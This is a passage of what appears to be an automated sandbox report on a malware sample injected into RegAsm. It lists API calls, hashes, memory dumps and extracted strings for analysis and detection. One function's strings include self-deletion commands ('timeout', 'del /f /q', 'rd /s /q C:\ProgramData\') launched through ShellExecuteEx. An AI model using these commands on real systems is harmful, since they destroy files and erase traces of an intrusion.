                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • memset.MSVCRT ref: 00408CCB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcat$lstrcpy$lstrlen$Heap$AllocCreateObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1592390033-0
                                                                                                                                                                                                • Opcode ID: 9d4c7270fa02360d8387ec90dbeae162b2b84d59e8b28bfaa3eb736c390bda4c
                                                                                                                                                                                                • Instruction ID: 971578dace80931ec5527b26863eca81062358470d0b15fb8bbd80e7cb2d12f6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d4c7270fa02360d8387ec90dbeae162b2b84d59e8b28bfaa3eb736c390bda4c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F15A71800158EADF05EBA2DD06EEEBB75AF25308F1044AEF442731E2DF791A18DB25
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004107CD Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004107D2
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410803
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041089B
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00410952
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 0041098E
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 004109D5
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00410A1C
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00410A63
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410BC6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                                                                                                                                • String ID: false$true
                                                                                                                                                                                                • API String ID: 49562497-2658103896
                                                                                                                                                                                                • Opcode ID: 04316544489357f2afa6c79bac0ca829a868ff856b9ec0809f4fe70a505de954
                                                                                                                                                                                                • Instruction ID: 0b5926a7128f84a3b2f222f3571b1dce6d90bbe111d8c5c82d424c5efd5d6e05
                                                                                                                                                                                                • Opcode Fuzzy Hash: 04316544489357f2afa6c79bac0ca829a868ff856b9ec0809f4fe70a505de954
                                                                                                                                                                                                • Instruction Fuzzy Hash: 37C16271804219AFDF54EBA5D845EDEBBB9AF14304F10447AF505F3192EB38AB88CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5B5D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
                                                                                                                                                                                                • API String ID: 0-3330941169
                                                                                                                                                                                                • Opcode ID: d0a43ee65c8d757d9063e16e7574d3220666983d4be0385eb926e458fdd0653f
                                                                                                                                                                                                • Instruction ID: 389387e5f51f5236985df99b9ac9a6b5a0d4f7680fe6ae746dba374890c773fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: d0a43ee65c8d757d9063e16e7574d3220666983d4be0385eb926e458fdd0653f
                                                                                                                                                                                                • Instruction Fuzzy Hash: E7712BBAF012515BEE059B19BD416DEBBD5AFC5212F0404BEF942C7201FB21F94A87B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00410BF7 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00410BFC
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00415D19), ref: 00410C1E
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00410C29
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410C40
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitH_prologProcessstrtok_s
                                                                                                                                                                                                • String ID: block
                                                                                                                                                                                                • API String ID: 3745986650-2199623458
                                                                                                                                                                                                • Opcode ID: 1a81c56778e5a514f09cbb8ab07a3d02e0e3386f1a59973d73ddf0c0ab6236da
                                                                                                                                                                                                • Instruction ID: df4849ec62e33a5e79d91673b6abf48bfc807c7432add9134e53bec16debb989
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a81c56778e5a514f09cbb8ab07a3d02e0e3386f1a59973d73ddf0c0ab6236da
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2041D779A40B11ABDB10AFF5AC45AEB77ADBB05749720462BB403E2550E7F8A5C08B18
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A5E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
                                                                                                                                                                                                • API String ID: 0-1070437968
                                                                                                                                                                                                • Opcode ID: ee373db9e8858e67ad36e18b1ba0ec5f35d7c97911b3f8ed77f22f05a554296f
                                                                                                                                                                                                • Instruction ID: 252e11fcdb0a8dc0b581dbcc0053057a365511732be12eebeeb4237b01422bd3
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee373db9e8858e67ad36e18b1ba0ec5f35d7c97911b3f8ed77f22f05a554296f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1102E2B59003019BE7109F34CC85BDB7BE8BFA4215F04892CF88A97342E775E449CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B519980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
                                                                                                                                                                                                • API String ID: 0-3900766660
                                                                                                                                                                                                • Opcode ID: 0fbdf3c3bbb569f24a187c52a3de07e1548afe0886924fb28969c4d5e5305c11
                                                                                                                                                                                                • Instruction ID: 791dbb314feed1ae5385d1c59becfe19553156ba35f812a615625713a425ff07
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fbdf3c3bbb569f24a187c52a3de07e1548afe0886924fb28969c4d5e5305c11
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE1D2B4A047419BF710CF24D881BDB77F9AF88615F04492CE8899F341E775E84ACBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4D3800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
                                                                                                                                                                                                • API String ID: 0-1477268580
                                                                                                                                                                                                • Opcode ID: 177c141532b3b755865261c9be925ac8f27997911e56f7d85f79e9e301f7f54d
                                                                                                                                                                                                • Instruction ID: 3b2cd21488c1a77348c817d867e1c13a69f09d89cf51f4129796cca164c766fc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 177c141532b3b755865261c9be925ac8f27997911e56f7d85f79e9e301f7f54d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7151EFB5A003019FDB109F28DC91BA6B7F5FFA4315F04896DE9568B341E771E844CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00412611 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00412616
                                                                                                                                                                                                • memset.MSVCRT ref: 00412636
                                                                                                                                                                                                • memset.MSVCRT ref: 00412642
                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00412657
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004127E3
                                                                                                                                                                                                • memset.MSVCRT ref: 004127F0
                                                                                                                                                                                                • memset.MSVCRT ref: 004127FE
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0041280F
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                • API String ID: 1312519015-206210831
                                                                                                                                                                                                • Opcode ID: 2d52401221631d3d1f354c715f94cbaa83706b91d1d0cf4e5a61c5fb4c4a708d
                                                                                                                                                                                                • Instruction ID: 3185a618bdba808ef0e449a7a5eb983d9a54b3b1afd772efa82c745700822a38
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d52401221631d3d1f354c715f94cbaa83706b91d1d0cf4e5a61c5fb4c4a708d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 685110B1C00258DADB01EBE1C986EDEBBB8AF18304F5045AFA545B3182DB785B49CB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5BA150 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 226COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s_data$data$id INTEGER PRIMARY KEY, block BLOB$idx$segid, term, pgno, PRIMARY KEY(segid, term)
                                                                                                                                                                                                • API String ID: 0-1009905541
                                                                                                                                                                                                • Opcode ID: 1af40d0754545ef80a2465a3bd91311787c326faaef44ccc71feca16b5fc4bba
                                                                                                                                                                                                • Instruction ID: a52e4a85186126051904bbd2d5fde67edc2af021f54ee9f019213d44b6f2427e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1af40d0754545ef80a2465a3bd91311787c326faaef44ccc71feca16b5fc4bba
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6071D3719003109BEB145F24DE88B8B77ADFFA4256F00482CFD8697211DF35E958CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5BF370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
